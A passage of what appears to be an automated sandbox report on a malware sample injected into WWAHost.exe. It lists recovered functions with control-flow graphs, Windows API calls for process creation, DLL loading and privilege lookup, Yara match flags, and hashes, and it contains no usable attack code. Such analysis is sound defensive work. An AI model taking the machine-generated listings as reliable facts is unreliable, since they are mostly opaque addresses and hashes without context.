                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
                                                  • Instruction ID: 299682ff307750e06faa59f1efb00e3d2aee2e065bb49e0b309dd58af0677512
                                                  • Opcode Fuzzy Hash: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
                                                  • Instruction Fuzzy Hash: 59900265321048071115E55A0714507008697D9391351C031F5005550CDB6188617161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 037595D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
                                                  • Instruction ID: 423dfe95f272bb9da6fa10e9ebbe4a319e027b44b9cff8538055a64474f5b3f4
                                                  • Opcode Fuzzy Hash: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
                                                  • Instruction Fuzzy Hash: 849002A1312048075115B15A4424616404A97E4241B51C031E5004590DCA6588917165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02947300 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 219 2947300-2947342 call 294a020 222 294741c-2947422 219->222 223 2947348-2947398 call 294a0f0 call 2939b40 call 2943e50 219->223 230 29473a0-29473b1 Sleep 223->230 231 2947416-294741a 230->231 232 29473b3-29473b9 230->232 231->222 231->230 233 29473e3-2947403 232->233 234 29473bb-29473e1 call 2946f30 232->234 236 2947409-294740c 233->236 237 2947404 call 2947130 233->237 234->236 236->231 237->236
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 029473A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 7175d68f425cbd9734874dc9a5e6ae5959c804b1f03efe41631106d50f2d7c85
                                                  • Instruction ID: bb42e3c5b6775b6bf2eb6803901fd204b35e396977b5a26b5dfdb88542fe0e9a
                                                  • Opcode Fuzzy Hash: 7175d68f425cbd9734874dc9a5e6ae5959c804b1f03efe41631106d50f2d7c85
                                                  • Instruction Fuzzy Hash: BA3190B6501704ABD715EFA4D8A0FA7F7B9EF88704F00851DFA195B241DB70B445CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029472F6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 239 29472f6-2947342 call 294a020 243 294741c-2947422 239->243 244 2947348-2947398 call 294a0f0 call 2939b40 call 2943e50 239->244 251 29473a0-29473b1 Sleep 244->251 252 2947416-294741a 251->252 253 29473b3-29473b9 251->253 252->243 252->251 254 29473e3-2947403 253->254 255 29473bb-29473e1 call 2946f30 253->255 257 2947409-294740c 254->257 258 2947404 call 2947130 254->258 255->257 257->252 258->257
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 029473A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 7d2b538d2ff31d5127a4766536fc0c8736a0fb59a48b1007a11b67156422bab4
                                                  • Instruction ID: a7abe13b09a605646c21a0730674de4850187ec8fa86dd7403444834a669779f
                                                  • Opcode Fuzzy Hash: 7d2b538d2ff31d5127a4766536fc0c8736a0fb59a48b1007a11b67156422bab4
                                                  • Instruction Fuzzy Hash: 5E21D2B1941304ABD710EFA4D8A0FABBBB9EF88704F10852DFA195B241DB70A445CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029488EE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 263 29488ee-2948906 264 294890c-2948921 RtlFreeHeap 263->264 265 2948907 call 29491e0 263->265 265->264
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02933B93), ref: 0294891D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: c12ec8d948933bb354d16f8afb2ce424dc6dfb751cdfcca622258ca01e1f6601
                                                  • Instruction ID: c4a8db608103c076fbc224701da0c52e7b3e5e963adb60494359d994419410e8
                                                  • Opcode Fuzzy Hash: c12ec8d948933bb354d16f8afb2ce424dc6dfb751cdfcca622258ca01e1f6601
                                                  • Instruction Fuzzy Hash: 53E01AB12002046BDB14DF54CC49EA777A9AF88750F014558F9195B241C631E910CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029488F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 266 29488f0-2948921 call 29491e0 RtlFreeHeap
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02933B93), ref: 0294891D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction ID: 43fec3e592d118d9e695f738d6a04f09d376850aab55e5c7bca2799d55646dc7
                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction Fuzzy Hash: 62E046B1200208ABDB18EF99CC48EA777ADEF88750F018558FE085B241CA30F910CBF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029489F5 Relevance: 3.1, APIs: 2, Instructions: 83processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 269 29489f5-29489fd 270 2948981-29489b8 CreateProcessInternalW 269->270 271 29489ff 269->271 272 2948a56-2948a6a call 29491e0 271->272 273 2948a01-2948a19 271->273 277 2948a6f-2948a84 LookupPrivilegeValueW 272->277 274 2948a1f-2948a40 273->274 275 2948a1a call 29491e0 273->275 275->274
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029489B4
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0293CFC2,0293CFC2,?,00000000,?,?), ref: 02948A80
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalLookupPrivilegeProcessValue
                                                  • String ID:
                                                  • API String ID: 65721159-0
                                                  • Opcode ID: 33f3667f199e7b61afa116ae72c517892be617d35d31ac409d663826fb352d2a
                                                  • Instruction ID: beeca8ba12bfa73e6d124e6ab6bb11895d311142d4588a4eb9c8a86e4038faa9
                                                  • Opcode Fuzzy Hash: 33f3667f199e7b61afa116ae72c517892be617d35d31ac409d663826fb352d2a
                                                  • Instruction Fuzzy Hash: 3121F5B2204108AFDB18DF99DC85EEB77ADAF8C754F058659FA1D97241CA30E911CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02937280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029372DA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 029372FB
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                  • Instruction ID: 0784ba1da71843504d2c16d685dacde513a502f4face9b72483add4d2027c197
                                                  • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                  • Instruction Fuzzy Hash: 5601A771A8022977F721A6949C02FFF776CAB41B51F140118FF04BA1C1EAD4690546F5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02939B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 489 2939b40-2939b5c 490 2939b64-2939b69 489->490 491 2939b5f call 294af70 489->491 492 2939b6b-2939b6e 490->492 493 2939b6f-2939b7d call 294b390 490->493 491->490 496 2939b7f-2939b8a call 294b610 493->496 497 2939b8d-2939b9e call 2949720 493->497 496->497 502 2939ba0-2939bb4 LdrLoadDll 497->502 503 2939bb7-2939bba 497->503 502->503
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02939BB2
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction ID: d3951f51c67cdfec9563b60f751aaf6952f6ca5a019e53188359a96937ed4b57
                                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction Fuzzy Hash: B1011EB6D4020DBBEF10DBE4DC41FDEB3B99B54308F0041A5A90897284FA71EB14CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02948960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 504 2948960-2948979 505 294897f-29489b8 CreateProcessInternalW 504->505 506 294897a call 29491e0 504->506 506->505
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029489B4
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction ID: 2a56ed75376291cc8f7a5b9cc70a0cb9e5fc63558f28f5bbfa614a462e10f151
                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction Fuzzy Hash: 5801B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0294895D Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 507 294895d-294897a call 29491e0 510 294897f-29489b8 CreateProcessInternalW 507->510
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029489B4
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 32fd021bcf649e48cdf4b8a56b4eb93fb2098e5c9897efcedbe0a826036c0b4d
                                                  • Instruction ID: d33f2b0de5cb5ad7b0f11df4528abba49fc0ac9a99f5cf6cd9e54a6450b1006b
                                                  • Opcode Fuzzy Hash: 32fd021bcf649e48cdf4b8a56b4eb93fb2098e5c9897efcedbe0a826036c0b4d
                                                  • Instruction Fuzzy Hash: F30119B2210108BFCB44DF99DC80EEB33ADAF8C350F158208FA1D93240CA30E801CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02947430 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0293CCF0,?,?), ref: 0294746C
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                  • Instruction ID: 62f7a1bd221820be0c280395c2fa64600931db0f2150c71321f2c3d1c9ea9698
                                                  • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                  • Instruction Fuzzy Hash: C4E06D333812043AE22065A9AC02FA7B29D8B81B24F540026FA4DEA2C0D995F80146A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02948A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0293CFC2,0293CFC2,?,00000000,?,?), ref: 02948A80
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction ID: 6af581c5bbb39bc24498ccfea733e0cf0278a96e406258ab86f0e1f385aa9ef0
                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction Fuzzy Hash: 7EE01AB12002086BDB10DF49CC84EE737ADAF88650F018154FA0857241C930E910CBF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02948A4D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0293CFC2,0293CFC2,?,00000000,?,?), ref: 02948A80
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 14912fa746234da3a388f5fa60583d672cb9a003d2fbc24ce0cf4d7aef5b3d3b
                                                  • Instruction ID: d9e27b2ebb7926d228c4847009a8e2649a5d779c2bd7abb7657dd19275d987bc
                                                  • Opcode Fuzzy Hash: 14912fa746234da3a388f5fa60583d672cb9a003d2fbc24ce0cf4d7aef5b3d3b
                                                  • Instruction Fuzzy Hash: 5EE01AB16042046BDB10DF94DC84FEB37AAAF88250F118165F90C97241C931E911CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029488B0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02943536,?,02943CAF,02943CAF,?,02943536,?,?,?,?,?,00000000,00000000,?), ref: 029488DD
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction ID: 1d77a45fc61776a093432b91c78ee861c0d2710fdcdaaf1c5e3167d76fb441d3
                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction Fuzzy Hash: B3E046B1200208ABDB14EF99CC44EA777ADEF88750F118558FE085B241CA30F910CBF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0293D430 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02937C83,?), ref: 0293D45B
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                  • Instruction ID: 055d5350359f225db32a3d272048648aa4e12611cd459949361fb81b53a329f5
                                                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                  • Instruction Fuzzy Hash: 01D05E617503042BE614AAA49C16F26328D5B45B54F494064FA48962C3DA50E4008565
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0375967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
                                                  • Instruction ID: 7c06ae1e292b2f386f418a5295893d4ca9075432bc6c5285c4573704a45a3a65
                                                  • Opcode Fuzzy Hash: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
                                                  • Instruction Fuzzy Hash: CCB09B719024C9C9F615D76146087177944B7D5741F16C061E6020641B4778C095F5B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 037AFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E037AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0375CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E037A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E037A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x037afdda
                                                  0x037afde2
                                                  0x037afde5
                                                  0x037afdec
                                                  0x037afdfa
                                                  0x037afdff
                                                  0x037afe0a
                                                  0x037afe0f
                                                  0x037afe17
                                                  0x037afe1e
                                                  0x037afe19
                                                  0x037afe19
                                                  0x037afe19
                                                  0x037afe20
                                                  0x037afe21
                                                  0x037afe22
                                                  0x037afe25
                                                  0x037afe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037AFDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037AFE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037AFE2B
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
                                                  • Instruction ID: ae2a64a2e0877d44d23dbe522c54ffca407fd13f36942ecc5688439e4019a864
                                                  • Opcode Fuzzy Hash: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
                                                  • Instruction Fuzzy Hash: DEF04C76100601BFD6205B49CC05F37BF5ADB80730F140314F628591D1E962F82086F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%